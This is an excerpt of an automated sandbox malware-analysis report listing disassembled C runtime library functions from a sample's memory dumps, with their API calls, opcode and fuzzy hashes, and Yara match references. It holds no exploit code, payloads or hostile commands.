                                                                                                                                                                                                                                  Function 004207C7 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420860
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420889
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,00420AE6,?,00000000), ref: 0042089E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                  • String ID: ACP$OCP$B
                                                                                                                                                                                                                                  • API String ID: 2299586839-1332025818
                                                                                                                                                                                                                                  • Opcode ID: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                  • Instruction ID: b7a8718eca8bd207e438c17e895b22dc0f84da9ff629001d2d850ed802a8b5f8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5321F422B00124AADB34AF14E900BA773E6EF90B10BD68476E809D7312E736DD41C3D9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BD0A2E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,05BD0D4D,?,00000000), ref: 05BD0AC7
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,05BD0D4D,?,00000000), ref: 05BD0AF0
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,05BD0D4D,?,00000000), ref: 05BD0B05
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                  • Opcode ID: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                  • Instruction ID: cc7cd76f0ea292ed5b8cde90b7f4a9219c22b314b1ff3294876ab26343467227
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16218B22B46108AAD730AB548948EA7F7A7FB80A64F4684A4E90A97100FB26ED41C760
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BD0C02 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: GetLastError.KERNEL32(?,?,05BBE697,?,?,?,05BBED94,?), ref: 05BC6F84
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: _free.LIBCMT ref: 05BC6FB7
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: SetLastError.KERNEL32(00000000), ref: 05BC6FF8
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: _abort.LIBCMT ref: 05BC6FFE
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: _free.LIBCMT ref: 05BC6FDF
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: SetLastError.KERNEL32(00000000), ref: 05BC6FEC
                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 05BD0D0E
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 05BD0D69
                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 05BD0D78
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,05BC45A4,00000040,?,05BC46C4,00000055,00000000,?,?,00000055,00000000), ref: 05BD0DC0
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,05BC4624,00000040), ref: 05BD0DDF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 745075371-0
                                                                                                                                                                                                                                  • Opcode ID: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                  • Instruction ID: d8336891d5cea96b023a4caf51575ffb6c4d8912856d00bbd9e11e79efe2d57b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A516F75A0420DAADB20EFA5DC49ABEB7B8FF44700F4444AAE905E7150FB70B9448B71
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BD02CA Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: GetLastError.KERNEL32(?,?,05BBE697,?,?,?,05BBED94,?), ref: 05BC6F84
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: _free.LIBCMT ref: 05BC6FB7
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: SetLastError.KERNEL32(00000000), ref: 05BC6FF8
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: _abort.LIBCMT ref: 05BC6FFE
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,05BC45AB,?,?,?,?,05BC4002,?,00000004), ref: 05BD03AC
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 05BD043C
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 05BD044A
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,05BC45AB,00000000,05BC46CB), ref: 05BD04ED
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4212172061-0
                                                                                                                                                                                                                                  • Opcode ID: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                  • Instruction ID: 4d918992920b58d8a517b134ef9f93f94aace39c97f9fa4948bcf18a7ff0441b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5461A47170460AAAD724FB74DC49FBAB7A8FF08750F1444EAE90597180FA74B9448BB4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00420326 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(0042044E,00000001,00000000,?,=CA,?,00420A7B,00000000,?,?,?), ref: 00420398
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                  • String ID: =CA${B
                                                                                                                                                                                                                                  • API String ID: 1084509184-2907596089
                                                                                                                                                                                                                                  • Opcode ID: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
                                                                                                                                                                                                                                  • Instruction ID: a8185422c35251c6cfc048f10f275341fbfc1625dfe7a1aac3b0cf2615d37100
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D11293A3003055FDB28DF39D8916BABBD1FF84358B54842EEA4687B41D775A843CB44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00411F6A Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$Info
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2509303402-0
                                                                                                                                                                                                                                  • Opcode ID: 9ba8043ac8ff267f0ce42ea0bddbd3aca1e886c3a33d2db2d31a05c5540ee44f
                                                                                                                                                                                                                                  • Instruction ID: f64e8217d5a59399788f44db3acace11ca7a1a82a17f4f1e7e4f503dd26c9166
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ba8043ac8ff267f0ce42ea0bddbd3aca1e886c3a33d2db2d31a05c5540ee44f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68B1CF71900305AFDB20DFA5C881BEEBBF5BF48304F14416EF959E7242D7B9A8918B64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BC21D1 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$Info
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2509303402-0
                                                                                                                                                                                                                                  • Opcode ID: 7f1cc673af9145743846b530fb17d4bb0f149097f4a5cdf7631a5188ec6ee8c8
                                                                                                                                                                                                                                  • Instruction ID: 0a5b7635404548c57dba04d673b23d0d738cd004557a8c14c23e3f7788b99776
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f1cc673af9145743846b530fb17d4bb0f149097f4a5cdf7631a5188ec6ee8c8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07B18E75A002099FDB21DFA9C884BEEFBF5FF08300F1440EDE996A7241DB75A9458B64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041F651 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 0041F695
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA01
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA13
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA25
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA37
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA49
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA5B
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA6D
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA7F
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA91
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAA3
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAB5
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAC7
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAD9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F68A
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F6AC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F6C1
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F6CC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F6EE
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F701
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F70F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F71A
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F752
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F759
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F776
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F78E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                  • Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                  • Instruction ID: c0d36dfa6e7f1bd62f92c80ef49453a98ce7ec3addb1216f5c788df5de5df6c1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68314A316007049FEB20AA3AE845BD773E8FB44318F15446FE859D72A1DB38FCC68A18
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BCF8B8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 05BCF8FC
                                                                                                                                                                                                                                    • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCEC68
                                                                                                                                                                                                                                    • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCEC7A
                                                                                                                                                                                                                                    • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCEC8C
                                                                                                                                                                                                                                    • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCEC9E
                                                                                                                                                                                                                                    • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCECB0
                                                                                                                                                                                                                                    • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCECC2
                                                                                                                                                                                                                                    • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCECD4
                                                                                                                                                                                                                                    • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCECE6
                                                                                                                                                                                                                                    • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCECF8
                                                                                                                                                                                                                                    • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCED0A
                                                                                                                                                                                                                                    • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCED1C
                                                                                                                                                                                                                                    • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCED2E
                                                                                                                                                                                                                                    • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCED40
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF8F1
                                                                                                                                                                                                                                    • Part of subcall function 05BC6501: HeapFree.KERNEL32(00000000,00000000,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?), ref: 05BC6517
                                                                                                                                                                                                                                    • Part of subcall function 05BC6501: GetLastError.KERNEL32(?,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?,?), ref: 05BC6529
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF913
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF928
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF933
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF955
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF968
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF976
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF981
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF9B9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF9C0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF9DD
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF9F5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                  • Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                  • Instruction ID: 74677cb0ba7fccb9a1ba9c33869fee70335c492af8e778f5dbd21e6e6bd48526
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B314F31A04205AFDF319E79D848F6ABBEAFF40214F2044DEE49ADB150EFB1F9418619
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041EAE2 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: d1f1aa2d03a28af46cbd75311468763efbf7631b30b7f566802b3458c1c144c6
                                                                                                                                                                                                                                  • Instruction ID: 07e65b0fe858109c33bb0f60f82280ccd5dee523497fe62cc235ec4013c6f493
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1f1aa2d03a28af46cbd75311468763efbf7631b30b7f566802b3458c1c144c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EC15575E40304ABDB20DBA9CC46FDE77F8EB48704F14416AFE05EB282D674AD818798
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00423356 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042435F), ref: 00423379
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DecodePointer
                                                                                                                                                                                                                                  • String ID: _CB$acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                  • API String ID: 3527080286-940912563
                                                                                                                                                                                                                                  • Opcode ID: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
                                                                                                                                                                                                                                  • Instruction ID: 5368ad48e2641d38b699083c4314cf7ba7867baba3e9f2aa5664b85b9913fc9a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52518970A00229DBCF10DFA9F9481ADBBB0FB09305FE4419BE481A6254CB7D9B65CB1D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00416C25 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C39
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C45
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C50
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C5B
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C66
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C71
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C7C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C87
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C92
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416CA0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                  • Instruction ID: 425b14d8582b8484cae793816d5f4fa8e3af98928aded5048720e3a5ca7bcabf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B311E976100218BFDF01FF95D952DD93B65EF48358B4280AAFD088F222DA35EE919B84
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

